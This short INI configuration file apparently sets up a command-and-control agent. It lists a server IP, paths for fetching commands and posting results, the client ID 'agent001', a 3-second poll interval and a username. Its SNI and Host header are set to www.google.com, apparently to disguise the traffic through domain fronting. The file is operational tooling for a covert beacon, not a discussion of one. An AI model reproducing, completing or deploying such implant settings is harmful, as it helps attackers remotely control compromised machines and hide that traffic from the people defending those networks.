[DEFAULT]
SERVER_IP = 35.75.21.171
SNI_HOST      = www.google.com
FETCH_PATH    = /fetch_command
POST_PATH     = /post_result
CLIENT_ID     = agent001
POLL_INTERVAL = 3
USERNAME      = Jack
HOST_HEADER   = www.google.com